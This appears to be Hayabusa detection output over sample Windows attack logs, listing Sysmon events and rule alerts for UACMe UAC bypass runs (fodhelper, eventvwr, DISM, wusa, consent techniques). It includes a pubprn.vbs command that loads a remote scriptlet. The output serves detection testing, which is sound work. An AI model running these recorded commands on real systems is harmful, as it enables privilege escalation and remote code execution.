06:34:45.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 34 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 34",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 33 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 
19:14:02.929 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 324 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\fodhelper.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 
+2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 32 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s 
Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 30 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe 
-pss -s 444 -p 6312 -ip 6312",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 : Path: C:\Windows\SysWOW64\WerFault.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\syswow64\wusa.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 23 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:54.900 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 406 000002806444C740 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" : Path: C:\Windows\System32\Dism.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.820 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 22 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC9C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC890 : Path: C:\Windows\System32\consent.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC170 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471300 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - 
Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.554 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 37 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 36 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool 
UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 